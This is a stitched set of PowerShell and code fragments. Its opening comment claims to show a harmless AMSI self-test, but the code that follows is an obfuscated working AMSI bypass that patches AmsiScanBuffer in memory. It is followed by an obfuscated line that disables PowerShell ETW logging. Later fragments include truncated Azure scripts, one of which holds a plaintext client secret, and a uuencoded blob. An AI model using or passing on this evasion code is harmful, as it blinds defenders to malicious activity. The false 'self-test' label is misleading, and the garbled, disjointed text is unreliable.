# AMSI self-test, not a bypass: "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"
# is the documented AMSI test pattern (the AMSI analogue of the EICAR string).
# The two concatenated literals only split the *source text*; the value handed to
# Invoke-Expression is the full test string, so a working AMSI provider that honours
# the test pattern is expected to block the Invoke-Expression call below.
# Useful for confirming that AMSI scanning is active on a host.
$teststring = "AMSI Test Sample: " + "7e72c3ce-861b-4339-8740-0ac1484c1386" | |
# Expected outcome on a host with functioning AMSI: the call is flagged/blocked
# rather than executed (the string itself is not a runnable command).
Invoke-Expression $teststring |
$data = @" | |
usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{- [D-llIm-port("ker-ne-l3-2")] pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me); [D-llIm-port("ke-rne-l3-2")] pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me); [D-llIm-port("ke-rn-el32")] pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect); pub-lic stat-ic void Ru-n() { Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l"); IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r"); In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5); uint old = 0; Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old); C-o-nso-l-e.Wr-i-teLi-n-e(old); byt-e[] pat-ch = new by-te[] { 0x75 }; M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1); Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d); }} | |
"@ | |
Add-Type $data.Replace('- |
[System.Diagnostics.Eventing.EventProvider]."G`etField"(-join([char[]](109,95,101,110,97,98,108,101,100)),-join([char[]](78,111,110,80,117,98,108,105,99,44,73,110,115,116,97,110,99,101)))."S`etValue"([Ref].Assembly."G`etType"(-join([char[]](83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,84,114,97,99,105,110,103,46,80,83,69,116,119,76,111,103,80,114,111,118,105,100,101,114)))."G`etField"(-join([char[]](101,116,119,80,114,111,118,105,100,101,114)),-join([char[]](78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99)))."G`etValue"($null),0) |
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 |
// Copyright 2022 Almond (almond.consulting) | |
// | |
// Author: Yannick Méheut (ymeheut@almond.consulting) | |
// | |
// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html | |
// | |
// Licensed under the Apache License, Version 2.0 (the "License"); | |
// you may not use this file except in compliance with the License. | |
// You may obtain a copy of the License at | |
// |
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404 | |
$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant) | |
$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant) | |
$spPassword = "5YB8Q~iFPkt7WXYbqZkzi42BqpPgVJCWR-assd1" # The client secret from the app (Source: Foreign Tenant) | |
$appName = "foreignApp" # The app name (Source: Foreign Tenant) | |
# -------------- | |
#Step 0 (Foreign Tenant): Create an application in the portal | |
# -------------- |
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404 | |
# -------------- | |
# Find foreign service principals with application permissions | |
# -------------- | |
Write-Host "[*] Log in with a user that has at least the Application.Read.All right `n" -ForegroundColor Green | |
Connect-MgGraph -scopes "Application.Read.All" -NoWelcome | |
Write-Host "[*] Output the connection context `n" -ForegroundColor Green | |
$mgcontext = Get-MgContext |
# Install and import the AzureAD module (if not already installed) | |
#Install-Module AzureAD -Force | |
#Import-Module AzureAD | |
# Connect to Azure AD | |
Connect-AzureAD | |
# Get all Azure AD groups | |
$AllGroups = Get-AzureADGroup -All $true |
function Get-EffectiveAccess { | |
[CmdletBinding()] | |
param( | |
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)] | |
[ValidatePattern('(?:(CN=([^,]*)),)?(?:((?:(?:CN|OU)=[^,]+,?)+),)?((?:DC=[^,]+,?)+)$')] | |
[alias('DistinguishedName')] | |
[string] $Identity, |
begin-base64 644 - | |
Li9hZGVsZWctdjIuemlwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDY2NiAAMDAwMDAw | |
IAAwMDAwMDAgADAwMDEzMzMzMDAyIDE0NTc0MDc3NTU2IDAxMTcxMAAgMAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMDAwMDAgADAwMDAw | |
MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQ |